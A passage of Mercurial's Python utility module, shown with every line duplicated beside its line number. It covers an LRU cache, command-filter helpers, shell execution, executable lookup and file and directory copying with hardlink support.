598
599 If no transaction was provided, this simply runs the body and returns
599 If no transaction was provided, this simply runs the body and returns
600 """
600 """
601 if not tr:
601 if not tr:
602 yield
602 yield
603 return
603 return
604 try:
604 try:
605 yield
605 yield
606 tr.close()
606 tr.close()
607 except error.InterventionRequired:
607 except error.InterventionRequired:
608 tr.close()
608 tr.close()
609 raise
609 raise
610 finally:
610 finally:
611 tr.release()
611 tr.release()
612
612
613 @contextlib.contextmanager
613 @contextlib.contextmanager
614 def nullcontextmanager():
614 def nullcontextmanager():
615 yield
615 yield
616
616
617 class _lrucachenode(object):
617 class _lrucachenode(object):
618 """A node in a doubly linked list.
618 """A node in a doubly linked list.
619
619
620 Holds a reference to nodes on either side as well as a key-value
620 Holds a reference to nodes on either side as well as a key-value
621 pair for the dictionary entry.
621 pair for the dictionary entry.
622 """
622 """
623 __slots__ = (u'next', u'prev', u'key', u'value')
623 __slots__ = (u'next', u'prev', u'key', u'value')
624
624
625 def __init__(self):
625 def __init__(self):
626 self.next = None
626 self.next = None
627 self.prev = None
627 self.prev = None
628
628
629 self.key = _notset
629 self.key = _notset
630 self.value = None
630 self.value = None
631
631
632 def markempty(self):
632 def markempty(self):
633 """Mark the node as emptied."""
633 """Mark the node as emptied."""
634 self.key = _notset
634 self.key = _notset
635
635
636 class lrucachedict(object):
636 class lrucachedict(object):
637 """Dict that caches most recent accesses and sets.
637 """Dict that caches most recent accesses and sets.
638
638
639 The dict consists of an actual backing dict - indexed by original
639 The dict consists of an actual backing dict - indexed by original
640 key - and a doubly linked circular list defining the order of entries in
640 key - and a doubly linked circular list defining the order of entries in
641 the cache.
641 the cache.
642
642
643 The head node is the newest entry in the cache. If the cache is full,
643 The head node is the newest entry in the cache. If the cache is full,
644 we recycle head.prev and make it the new head. Cache accesses result in
644 we recycle head.prev and make it the new head. Cache accesses result in
645 the node being moved to before the existing head and being marked as the
645 the node being moved to before the existing head and being marked as the
646 new head node.
646 new head node.
647 """
647 """
648 def __init__(self, max):
648 def __init__(self, max):
649 self._cache = {}
649 self._cache = {}
650
650
651 self._head = head = _lrucachenode()
651 self._head = head = _lrucachenode()
652 head.prev = head
652 head.prev = head
653 head.next = head
653 head.next = head
654 self._size = 1
654 self._size = 1
655 self._capacity = max
655 self._capacity = max
656
656
657 def __len__(self):
657 def __len__(self):
658 return len(self._cache)
658 return len(self._cache)
659
659
660 def __contains__(self, k):
660 def __contains__(self, k):
661 return k in self._cache
661 return k in self._cache
662
662
663 def __iter__(self):
663 def __iter__(self):
664 # We don't have to iterate in cache order, but why not.
664 # We don't have to iterate in cache order, but why not.
665 n = self._head
665 n = self._head
666 for i in range(len(self._cache)):
666 for i in range(len(self._cache)):
667 yield n.key
667 yield n.key
668 n = n.next
668 n = n.next
669
669
670 def __getitem__(self, k):
670 def __getitem__(self, k):
671 node = self._cache[k]
671 node = self._cache[k]
672 self._movetohead(node)
672 self._movetohead(node)
673 return node.value
673 return node.value
674
674
675 def __setitem__(self, k, v):
675 def __setitem__(self, k, v):
676 node = self._cache.get(k)
676 node = self._cache.get(k)
677 # Replace existing value and mark as newest.
677 # Replace existing value and mark as newest.
678 if node is not None:
678 if node is not None:
679 node.value = v
679 node.value = v
680 self._movetohead(node)
680 self._movetohead(node)
681 return
681 return
682
682
683 if self._size < self._capacity:
683 if self._size < self._capacity:
684 node = self._addcapacity()
684 node = self._addcapacity()
685 else:
685 else:
686 # Grab the last/oldest item.
686 # Grab the last/oldest item.
687 node = self._head.prev
687 node = self._head.prev
688
688
689 # At capacity. Kill the old entry.
689 # At capacity. Kill the old entry.
690 if node.key is not _notset:
690 if node.key is not _notset:
691 del self._cache[node.key]
691 del self._cache[node.key]
692
692
693 node.key = k
693 node.key = k
694 node.value = v
694 node.value = v
695 self._cache[k] = node
695 self._cache[k] = node
696 # And mark it as newest entry. No need to adjust order since it
696 # And mark it as newest entry. No need to adjust order since it
697 # is already self._head.prev.
697 # is already self._head.prev.
698 self._head = node
698 self._head = node
699
699
700 def __delitem__(self, k):
700 def __delitem__(self, k):
701 node = self._cache.pop(k)
701 node = self._cache.pop(k)
702 node.markempty()
702 node.markempty()
703
703
704 # Temporarily mark as newest item before re-adjusting head to make
704 # Temporarily mark as newest item before re-adjusting head to make
705 # this node the oldest item.
705 # this node the oldest item.
706 self._movetohead(node)
706 self._movetohead(node)
707 self._head = node.next
707 self._head = node.next
708
708
709 # Additional dict methods.
709 # Additional dict methods.
710
710
711 def get(self, k, default=None):
711 def get(self, k, default=None):
712 try:
712 try:
713 return self._cache[k].value
713 return self._cache[k].value
714 except KeyError:
714 except KeyError:
715 return default
715 return default
716
716
717 def clear(self):
717 def clear(self):
718 n = self._head
718 n = self._head
719 while n.key is not _notset:
719 while n.key is not _notset:
720 n.markempty()
720 n.markempty()
721 n = n.next
721 n = n.next
722
722
723 self._cache.clear()
723 self._cache.clear()
724
724
725 def copy(self):
725 def copy(self):
726 result = lrucachedict(self._capacity)
726 result = lrucachedict(self._capacity)
727 n = self._head.prev
727 n = self._head.prev
728 # Iterate in oldest-to-newest order, so the copy has the right ordering
728 # Iterate in oldest-to-newest order, so the copy has the right ordering
729 for i in range(len(self._cache)):
729 for i in range(len(self._cache)):
730 result[n.key] = n.value
730 result[n.key] = n.value
731 n = n.prev
731 n = n.prev
732 return result
732 return result
733
733
734 def _movetohead(self, node):
734 def _movetohead(self, node):
735 """Mark a node as the newest, making it the new head.
735 """Mark a node as the newest, making it the new head.
736
736
737 When a node is accessed, it becomes the freshest entry in the LRU
737 When a node is accessed, it becomes the freshest entry in the LRU
738 list, which is denoted by self._head.
738 list, which is denoted by self._head.
739
739
740 Visually, let's make ``N`` the new head node (* denotes head):
740 Visually, let's make ``N`` the new head node (* denotes head):
741
741
742 previous/oldest <-> head <-> next/next newest
742 previous/oldest <-> head <-> next/next newest
743
743
744 ----<->--- A* ---<->-----
744 ----<->--- A* ---<->-----
745 | |
745 | |
746 E <-> D <-> N <-> C <-> B
746 E <-> D <-> N <-> C <-> B
747
747
748 To:
748 To:
749
749
750 ----<->--- N* ---<->-----
750 ----<->--- N* ---<->-----
751 | |
751 | |
752 E <-> D <-> C <-> B <-> A
752 E <-> D <-> C <-> B <-> A
753
753
754 This requires the following moves:
754 This requires the following moves:
755
755
756 C.next = D (node.prev.next = node.next)
756 C.next = D (node.prev.next = node.next)
757 D.prev = C (node.next.prev = node.prev)
757 D.prev = C (node.next.prev = node.prev)
758 E.next = N (head.prev.next = node)
758 E.next = N (head.prev.next = node)
759 N.prev = E (node.prev = head.prev)
759 N.prev = E (node.prev = head.prev)
760 N.next = A (node.next = head)
760 N.next = A (node.next = head)
761 A.prev = N (head.prev = node)
761 A.prev = N (head.prev = node)
762 """
762 """
763 head = self._head
763 head = self._head
764 # C.next = D
764 # C.next = D
765 node.prev.next = node.next
765 node.prev.next = node.next
766 # D.prev = C
766 # D.prev = C
767 node.next.prev = node.prev
767 node.next.prev = node.prev
768 # N.prev = E
768 # N.prev = E
769 node.prev = head.prev
769 node.prev = head.prev
770 # N.next = A
770 # N.next = A
771 # It is tempting to do just "head" here, however if node is
771 # It is tempting to do just "head" here, however if node is
772 # adjacent to head, this will do bad things.
772 # adjacent to head, this will do bad things.
773 node.next = head.prev.next
773 node.next = head.prev.next
774 # E.next = N
774 # E.next = N
775 node.next.prev = node
775 node.next.prev = node
776 # A.prev = N
776 # A.prev = N
777 node.prev.next = node
777 node.prev.next = node
778
778
779 self._head = node
779 self._head = node
780
780
781 def _addcapacity(self):
781 def _addcapacity(self):
782 """Add a node to the circular linked list.
782 """Add a node to the circular linked list.
783
783
784 The new node is inserted before the head node.
784 The new node is inserted before the head node.
785 """
785 """
786 head = self._head
786 head = self._head
787 node = _lrucachenode()
787 node = _lrucachenode()
788 head.prev.next = node
788 head.prev.next = node
789 node.prev = head.prev
789 node.prev = head.prev
790 node.next = head
790 node.next = head
791 head.prev = node
791 head.prev = node
792 self._size += 1
792 self._size += 1
793 return node
793 return node
794
794
795 def lrucachefunc(func):
795 def lrucachefunc(func):
796 '''cache most recent results of function calls'''
796 '''cache most recent results of function calls'''
797 cache = {}
797 cache = {}
798 order = collections.deque()
798 order = collections.deque()
799 if func.__code__.co_argcount == 1:
799 if func.__code__.co_argcount == 1:
800 def f(arg):
800 def f(arg):
801 if arg not in cache:
801 if arg not in cache:
802 if len(cache) > 20:
802 if len(cache) > 20:
803 del cache[order.popleft()]
803 del cache[order.popleft()]
804 cache[arg] = func(arg)
804 cache[arg] = func(arg)
805 else:
805 else:
806 order.remove(arg)
806 order.remove(arg)
807 order.append(arg)
807 order.append(arg)
808 return cache[arg]
808 return cache[arg]
809 else:
809 else:
810 def f(*args):
810 def f(*args):
811 if args not in cache:
811 if args not in cache:
812 if len(cache) > 20:
812 if len(cache) > 20:
813 del cache[order.popleft()]
813 del cache[order.popleft()]
814 cache[args] = func(*args)
814 cache[args] = func(*args)
815 else:
815 else:
816 order.remove(args)
816 order.remove(args)
817 order.append(args)
817 order.append(args)
818 return cache[args]
818 return cache[args]
819
819
820 return f
820 return f
821
821
822 class propertycache(object):
822 class propertycache(object):
823 def __init__(self, func):
823 def __init__(self, func):
824 self.func = func
824 self.func = func
825 self.name = func.__name__
825 self.name = func.__name__
826 def __get__(self, obj, type=None):
826 def __get__(self, obj, type=None):
827 result = self.func(obj)
827 result = self.func(obj)
828 self.cachevalue(obj, result)
828 self.cachevalue(obj, result)
829 return result
829 return result
830
830
831 def cachevalue(self, obj, value):
831 def cachevalue(self, obj, value):
832 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
832 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
833 obj.__dict__[self.name] = value
833 obj.__dict__[self.name] = value
834
834
835 def pipefilter(s, cmd):
835 def pipefilter(s, cmd):
836 '''filter string S through command CMD, returning its output'''
836 '''filter string S through command CMD, returning its output'''
837 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
837 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
838 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
838 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
839 pout, perr = p.communicate(s)
839 pout, perr = p.communicate(s)
840 return pout
840 return pout
841
841
842 def tempfilter(s, cmd):
842 def tempfilter(s, cmd):
843 '''filter string S through a pair of temporary files with CMD.
843 '''filter string S through a pair of temporary files with CMD.
844 CMD is used as a template to create the real command to be run,
844 CMD is used as a template to create the real command to be run,
845 with the strings INFILE and OUTFILE replaced by the real names of
845 with the strings INFILE and OUTFILE replaced by the real names of
846 the temporary files generated.'''
846 the temporary files generated.'''
847 inname, outname = None, None
847 inname, outname = None, None
848 try:
848 try:
849 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
849 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
850 fp = os.fdopen(infd, pycompat.sysstr('wb'))
850 fp = os.fdopen(infd, pycompat.sysstr('wb'))
851 fp.write(s)
851 fp.write(s)
852 fp.close()
852 fp.close()
853 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
853 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
854 os.close(outfd)
854 os.close(outfd)
855 cmd = cmd.replace('INFILE', inname)
855 cmd = cmd.replace('INFILE', inname)
856 cmd = cmd.replace('OUTFILE', outname)
856 cmd = cmd.replace('OUTFILE', outname)
857 code = os.system(cmd)
857 code = os.system(cmd)
858 if pycompat.sysplatform == 'OpenVMS' and code & 1:
858 if pycompat.sysplatform == 'OpenVMS' and code & 1:
859 code = 0
859 code = 0
860 if code:
860 if code:
861 raise Abort(_("command '%s' failed: %s") %
861 raise Abort(_("command '%s' failed: %s") %
862 (cmd, explainexit(code)))
862 (cmd, explainexit(code)))
863 return readfile(outname)
863 return readfile(outname)
864 finally:
864 finally:
865 try:
865 try:
866 if inname:
866 if inname:
867 os.unlink(inname)
867 os.unlink(inname)
868 except OSError:
868 except OSError:
869 pass
869 pass
870 try:
870 try:
871 if outname:
871 if outname:
872 os.unlink(outname)
872 os.unlink(outname)
873 except OSError:
873 except OSError:
874 pass
874 pass
875
875
876 filtertable = {
876 filtertable = {
877 'tempfile:': tempfilter,
877 'tempfile:': tempfilter,
878 'pipe:': pipefilter,
878 'pipe:': pipefilter,
879 }
879 }
880
880
881 def filter(s, cmd):
881 def filter(s, cmd):
882 "filter a string through a command that transforms its input to its output"
882 "filter a string through a command that transforms its input to its output"
883 for name, fn in filtertable.iteritems():
883 for name, fn in filtertable.iteritems():
884 if cmd.startswith(name):
884 if cmd.startswith(name):
885 return fn(s, cmd[len(name):].lstrip())
885 return fn(s, cmd[len(name):].lstrip())
886 return pipefilter(s, cmd)
886 return pipefilter(s, cmd)
887
887
888 def binary(s):
888 def binary(s):
889 """return true if a string is binary data"""
889 """return true if a string is binary data"""
890 return bool(s and '\0' in s)
890 return bool(s and '\0' in s)
891
891
892 def increasingchunks(source, min=1024, max=65536):
892 def increasingchunks(source, min=1024, max=65536):
893 '''return no less than min bytes per chunk while data remains,
893 '''return no less than min bytes per chunk while data remains,
894 doubling min after each chunk until it reaches max'''
894 doubling min after each chunk until it reaches max'''
895 def log2(x):
895 def log2(x):
896 if not x:
896 if not x:
897 return 0
897 return 0
898 i = 0
898 i = 0
899 while x:
899 while x:
900 x >>= 1
900 x >>= 1
901 i += 1
901 i += 1
902 return i - 1
902 return i - 1
903
903
904 buf = []
904 buf = []
905 blen = 0
905 blen = 0
906 for chunk in source:
906 for chunk in source:
907 buf.append(chunk)
907 buf.append(chunk)
908 blen += len(chunk)
908 blen += len(chunk)
909 if blen >= min:
909 if blen >= min:
910 if min < max:
910 if min < max:
911 min = min << 1
911 min = min << 1
912 nmin = 1 << log2(blen)
912 nmin = 1 << log2(blen)
913 if nmin > min:
913 if nmin > min:
914 min = nmin
914 min = nmin
915 if min > max:
915 if min > max:
916 min = max
916 min = max
917 yield ''.join(buf)
917 yield ''.join(buf)
918 blen = 0
918 blen = 0
919 buf = []
919 buf = []
920 if buf:
920 if buf:
921 yield ''.join(buf)
921 yield ''.join(buf)
922
922
923 Abort = error.Abort
923 Abort = error.Abort
924
924
925 def always(fn):
925 def always(fn):
926 return True
926 return True
927
927
928 def never(fn):
928 def never(fn):
929 return False
929 return False
930
930
931 def nogc(func):
931 def nogc(func):
932 """disable garbage collector
932 """disable garbage collector
933
933
934 Python's garbage collector triggers a GC each time a certain number of
934 Python's garbage collector triggers a GC each time a certain number of
935 container objects (the number being defined by gc.get_threshold()) are
935 container objects (the number being defined by gc.get_threshold()) are
936 allocated even when marked not to be tracked by the collector. Tracking has
936 allocated even when marked not to be tracked by the collector. Tracking has
937 no effect on when GCs are triggered, only on what objects the GC looks
937 no effect on when GCs are triggered, only on what objects the GC looks
938 into. As a workaround, disable GC while building complex (huge)
938 into. As a workaround, disable GC while building complex (huge)
939 containers.
939 containers.
940
940
941 This garbage collector issue have been fixed in 2.7.
941 This garbage collector issue have been fixed in 2.7.
942 """
942 """
943 if sys.version_info >= (2, 7):
943 if sys.version_info >= (2, 7):
944 return func
944 return func
945 def wrapper(*args, **kwargs):
945 def wrapper(*args, **kwargs):
946 gcenabled = gc.isenabled()
946 gcenabled = gc.isenabled()
947 gc.disable()
947 gc.disable()
948 try:
948 try:
949 return func(*args, **kwargs)
949 return func(*args, **kwargs)
950 finally:
950 finally:
951 if gcenabled:
951 if gcenabled:
952 gc.enable()
952 gc.enable()
953 return wrapper
953 return wrapper
954
954
955 def pathto(root, n1, n2):
955 def pathto(root, n1, n2):
956 '''return the relative path from one place to another.
956 '''return the relative path from one place to another.
957 root should use os.sep to separate directories
957 root should use os.sep to separate directories
958 n1 should use os.sep to separate directories
958 n1 should use os.sep to separate directories
959 n2 should use "/" to separate directories
959 n2 should use "/" to separate directories
960 returns an os.sep-separated path.
960 returns an os.sep-separated path.
961
961
962 If n1 is a relative path, it's assumed it's
962 If n1 is a relative path, it's assumed it's
963 relative to root.
963 relative to root.
964 n2 should always be relative to root.
964 n2 should always be relative to root.
965 '''
965 '''
966 if not n1:
966 if not n1:
967 return localpath(n2)
967 return localpath(n2)
968 if os.path.isabs(n1):
968 if os.path.isabs(n1):
969 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
969 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
970 return os.path.join(root, localpath(n2))
970 return os.path.join(root, localpath(n2))
971 n2 = '/'.join((pconvert(root), n2))
971 n2 = '/'.join((pconvert(root), n2))
972 a, b = splitpath(n1), n2.split('/')
972 a, b = splitpath(n1), n2.split('/')
973 a.reverse()
973 a.reverse()
974 b.reverse()
974 b.reverse()
975 while a and b and a[-1] == b[-1]:
975 while a and b and a[-1] == b[-1]:
976 a.pop()
976 a.pop()
977 b.pop()
977 b.pop()
978 b.reverse()
978 b.reverse()
979 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
979 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
980
980
981 def mainfrozen():
981 def mainfrozen():
982 """return True if we are a frozen executable.
982 """return True if we are a frozen executable.
983
983
984 The code supports py2exe (most common, Windows only) and tools/freeze
984 The code supports py2exe (most common, Windows only) and tools/freeze
985 (portable, not much used).
985 (portable, not much used).
986 """
986 """
987 return (safehasattr(sys, "frozen") or # new py2exe
987 return (safehasattr(sys, "frozen") or # new py2exe
988 safehasattr(sys, "importers") or # old py2exe
988 safehasattr(sys, "importers") or # old py2exe
989 imp.is_frozen(u"__main__")) # tools/freeze
989 imp.is_frozen(u"__main__")) # tools/freeze
990
990
991 # the location of data files matching the source code
991 # the location of data files matching the source code
992 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
992 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
993 # executable version (py2exe) doesn't support __file__
993 # executable version (py2exe) doesn't support __file__
994 datapath = os.path.dirname(pycompat.sysexecutable)
994 datapath = os.path.dirname(pycompat.sysexecutable)
995 else:
995 else:
996 datapath = os.path.dirname(pycompat.fsencode(__file__))
996 datapath = os.path.dirname(pycompat.fsencode(__file__))
997
997
998 i18n.setdatapath(datapath)
998 i18n.setdatapath(datapath)
999
999
1000 _hgexecutable = None
1000 _hgexecutable = None
1001
1001
1002 def hgexecutable():
1002 def hgexecutable():
1003 """return location of the 'hg' executable.
1003 """return location of the 'hg' executable.
1004
1004
1005 Defaults to $HG or 'hg' in the search path.
1005 Defaults to $HG or 'hg' in the search path.
1006 """
1006 """
1007 if _hgexecutable is None:
1007 if _hgexecutable is None:
1008 hg = encoding.environ.get('HG')
1008 hg = encoding.environ.get('HG')
1009 mainmod = sys.modules[pycompat.sysstr('__main__')]
1009 mainmod = sys.modules[pycompat.sysstr('__main__')]
1010 if hg:
1010 if hg:
1011 _sethgexecutable(hg)
1011 _sethgexecutable(hg)
1012 elif mainfrozen():
1012 elif mainfrozen():
1013 if getattr(sys, 'frozen', None) == 'macosx_app':
1013 if getattr(sys, 'frozen', None) == 'macosx_app':
1014 # Env variable set by py2app
1014 # Env variable set by py2app
1015 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1015 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1016 else:
1016 else:
1017 _sethgexecutable(pycompat.sysexecutable)
1017 _sethgexecutable(pycompat.sysexecutable)
1018 elif (os.path.basename(
1018 elif (os.path.basename(
1019 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1019 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1020 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1020 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1021 else:
1021 else:
1022 exe = findexe('hg') or os.path.basename(sys.argv[0])
1022 exe = findexe('hg') or os.path.basename(sys.argv[0])
1023 _sethgexecutable(exe)
1023 _sethgexecutable(exe)
1024 return _hgexecutable
1024 return _hgexecutable
1025
1025
1026 def _sethgexecutable(path):
1026 def _sethgexecutable(path):
1027 """set location of the 'hg' executable"""
1027 """set location of the 'hg' executable"""
1028 global _hgexecutable
1028 global _hgexecutable
1029 _hgexecutable = path
1029 _hgexecutable = path
1030
1030
1031 def _isstdout(f):
1031 def _isstdout(f):
1032 fileno = getattr(f, 'fileno', None)
1032 fileno = getattr(f, 'fileno', None)
1033 return fileno and fileno() == sys.__stdout__.fileno()
1033 return fileno and fileno() == sys.__stdout__.fileno()
1034
1034
1035 def shellenviron(environ=None):
1035 def shellenviron(environ=None):
1036 """return environ with optional override, useful for shelling out"""
1036 """return environ with optional override, useful for shelling out"""
1037 def py2shell(val):
1037 def py2shell(val):
1038 'convert python object into string that is useful to shell'
1038 'convert python object into string that is useful to shell'
1039 if val is None or val is False:
1039 if val is None or val is False:
1040 return '0'
1040 return '0'
1041 if val is True:
1041 if val is True:
1042 return '1'
1042 return '1'
1043 return str(val)
1043 return str(val)
1044 env = dict(encoding.environ)
1044 env = dict(encoding.environ)
1045 if environ:
1045 if environ:
1046 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1046 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1047 env['HG'] = hgexecutable()
1047 env['HG'] = hgexecutable()
1048 return env
1048 return env
1049
1049
1050 def system(cmd, environ=None, cwd=None, out=None):
1050 def system(cmd, environ=None, cwd=None, out=None):
1051 '''enhanced shell command execution.
1051 '''enhanced shell command execution.
1052 run with environment maybe modified, maybe in different dir.
1052 run with environment maybe modified, maybe in different dir.
1053
1053
1054 if out is specified, it is assumed to be a file-like object that has a
1054 if out is specified, it is assumed to be a file-like object that has a
1055 write() method. stdout and stderr will be redirected to out.'''
1055 write() method. stdout and stderr will be redirected to out.'''
1056 try:
1056 try:
1057 stdout.flush()
1057 stdout.flush()
1058 except Exception:
1058 except Exception:
1059 pass
1059 pass
1060 cmd = quotecommand(cmd)
1060 cmd = quotecommand(cmd)
1061 env = shellenviron(environ)
1061 env = shellenviron(environ)
1062 if out is None or _isstdout(out):
1062 if out is None or _isstdout(out):
1063 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1063 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1064 env=env, cwd=cwd)
1064 env=env, cwd=cwd)
1065 else:
1065 else:
1066 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1066 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1067 env=env, cwd=cwd, stdout=subprocess.PIPE,
1067 env=env, cwd=cwd, stdout=subprocess.PIPE,
1068 stderr=subprocess.STDOUT)
1068 stderr=subprocess.STDOUT)
1069 for line in iter(proc.stdout.readline, ''):
1069 for line in iter(proc.stdout.readline, ''):
1070 out.write(line)
1070 out.write(line)
1071 proc.wait()
1071 proc.wait()
1072 rc = proc.returncode
1072 rc = proc.returncode
1073 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1073 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1074 rc = 0
1074 rc = 0
1075 return rc
1075 return rc
1076
1076
1077 def checksignature(func):
1077 def checksignature(func):
1078 '''wrap a function with code to check for calling errors'''
1078 '''wrap a function with code to check for calling errors'''
1079 def check(*args, **kwargs):
1079 def check(*args, **kwargs):
1080 try:
1080 try:
1081 return func(*args, **kwargs)
1081 return func(*args, **kwargs)
1082 except TypeError:
1082 except TypeError:
1083 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1083 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1084 raise error.SignatureError
1084 raise error.SignatureError
1085 raise
1085 raise
1086
1086
1087 return check
1087 return check
1088
1088
1089 # a whilelist of known filesystems where hardlink works reliably
1089 # a whilelist of known filesystems where hardlink works reliably
1090 _hardlinkfswhitelist = {
1090 _hardlinkfswhitelist = {
1091 'btrfs',
1091 'btrfs',
1092 'ext2',
1092 'ext2',
1093 'ext3',
1093 'ext3',
1094 'ext4',
1094 'ext4',
1095 'hfs',
1095 'hfs',
1096 'jfs',
1096 'jfs',
1097 'reiserfs',
1097 'reiserfs',
1098 'tmpfs',
1098 'tmpfs',
1099 'ufs',
1099 'ufs',
1100 'xfs',
1100 'xfs',
1101 'zfs',
1101 'zfs',
1102 }
1102 }
1103
1103
1104 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1104 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1105 '''copy a file, preserving mode and optionally other stat info like
1105 '''copy a file, preserving mode and optionally other stat info like
1106 atime/mtime
1106 atime/mtime
1107
1107
1108 checkambig argument is used with filestat, and is useful only if
1108 checkambig argument is used with filestat, and is useful only if
1109 destination file is guarded by any lock (e.g. repo.lock or
1109 destination file is guarded by any lock (e.g. repo.lock or
1110 repo.wlock).
1110 repo.wlock).
1111
1111
1112 copystat and checkambig should be exclusive.
1112 copystat and checkambig should be exclusive.
1113 '''
1113 '''
1114 assert not (copystat and checkambig)
1114 assert not (copystat and checkambig)
1115 oldstat = None
1115 oldstat = None
1116 if os.path.lexists(dest):
1116 if os.path.lexists(dest):
1117 if checkambig:
1117 if checkambig:
1118 oldstat = checkambig and filestat.frompath(dest)
1118 oldstat = checkambig and filestat.frompath(dest)
1119 unlink(dest)
1119 unlink(dest)
1120 if hardlink:
1120 if hardlink:
1121 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1121 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1122 # unless we are confident that dest is on a whitelisted filesystem.
1122 # unless we are confident that dest is on a whitelisted filesystem.
1123 try:
1123 try:
1124 fstype = getfstype(os.path.dirname(dest))
1124 fstype = getfstype(os.path.dirname(dest))
1125 except OSError:
1125 except OSError:
1126 fstype = None
1126 fstype = None
1127 if fstype not in _hardlinkfswhitelist:
1127 if fstype not in _hardlinkfswhitelist:
1128 hardlink = False
1128 hardlink = False
1129 if hardlink:
1129 if hardlink:
1130 try:
1130 try:
1131 oslink(src, dest)
1131 oslink(src, dest)
1132 return
1132 return
1133 except (IOError, OSError):
1133 except (IOError, OSError):
1134 pass # fall back to normal copy
1134 pass # fall back to normal copy
1135 if os.path.islink(src):
1135 if os.path.islink(src):
1136 os.symlink(os.readlink(src), dest)
1136 os.symlink(os.readlink(src), dest)
1137 # copytime is ignored for symlinks, but in general copytime isn't needed
1137 # copytime is ignored for symlinks, but in general copytime isn't needed
1138 # for them anyway
1138 # for them anyway
1139 else:
1139 else:
1140 try:
1140 try:
1141 shutil.copyfile(src, dest)
1141 shutil.copyfile(src, dest)
1142 if copystat:
1142 if copystat:
1143 # copystat also copies mode
1143 # copystat also copies mode
1144 shutil.copystat(src, dest)
1144 shutil.copystat(src, dest)
1145 else:
1145 else:
1146 shutil.copymode(src, dest)
1146 shutil.copymode(src, dest)
1147 if oldstat and oldstat.stat:
1147 if oldstat and oldstat.stat:
1148 newstat = filestat.frompath(dest)
1148 newstat = filestat.frompath(dest)
1149 if newstat.isambig(oldstat):
1149 if newstat.isambig(oldstat):
1150 # stat of copied file is ambiguous to original one
1150 # stat of copied file is ambiguous to original one
1151 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1151 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1152 os.utime(dest, (advanced, advanced))
1152 os.utime(dest, (advanced, advanced))
1153 except shutil.Error as inst:
1153 except shutil.Error as inst:
1154 raise Abort(str(inst))
1154 raise Abort(str(inst))
1155
1155
1156 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1156 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1157 """Copy a directory tree using hardlinks if possible."""
1157 """Copy a directory tree using hardlinks if possible."""
1158 num = 0
1158 num = 0
1159
1159
1160 gettopic = lambda: hardlink and _('linking') or _('copying')
1160 gettopic = lambda: hardlink and _('linking') or _('copying')
1161
1161
1162 if os.path.isdir(src):
1162 if os.path.isdir(src):
1163 if hardlink is None:
1163 if hardlink is None:
1164 hardlink = (os.stat(src).st_dev ==
1164 hardlink = (os.stat(src).st_dev ==
1165 os.stat(os.path.dirname(dst)).st_dev)
1165 os.stat(os.path.dirname(dst)).st_dev)
1166 topic = gettopic()
1166 topic = gettopic()
1167 os.mkdir(dst)
1167 os.mkdir(dst)
1168 for name, kind in listdir(src):
1168 for name, kind in listdir(src):
1169 srcname = os.path.join(src, name)
1169 srcname = os.path.join(src, name)
1170 dstname = os.path.join(dst, name)
1170 dstname = os.path.join(dst, name)
1171 def nprog(t, pos):
1171 def nprog(t, pos):
1172 if pos is not None:
1172 if pos is not None:
1173 return progress(t, pos + num)
1173 return progress(t, pos + num)
1174 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1174 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1175 num += n
1175 num += n
1176 else:
1176 else:
1177 if hardlink is None:
1177 if hardlink is None:
1178 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1178 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1179 os.stat(os.path.dirname(dst)).st_dev)
1179 os.stat(os.path.dirname(dst)).st_dev)
1180 topic = gettopic()
1180 topic = gettopic()
1181
1181
1182 if hardlink:
1182 if hardlink:
1183 try:
1183 try:
1184 oslink(src, dst)
1184 oslink(src, dst)
1185 except (IOError, OSError):
1185 except (IOError, OSError):
1186 hardlink = False
1186 hardlink = False
1187 shutil.copy(src, dst)
1187 shutil.copy(src, dst)
1188 else:
1188 else:
1189 shutil.copy(src, dst)
1189 shutil.copy(src, dst)
1190 num += 1
1190 num += 1
1191 progress(topic, num)
1191 progress(topic, num)
1192 progress(topic, None)
1192 progress(topic, None)
1193
1193
1194 return hardlink, num
1194 return hardlink, num
1195
1195
1196 _winreservednames = b'''con prn aux nul
1196 _winreservednames = b'''con prn aux nul
1197 com1 com2 com3 com4 com5 com6 com7 com8 com9
1197 com1 com2 com3 com4 com5 com6 com7 com8 com9
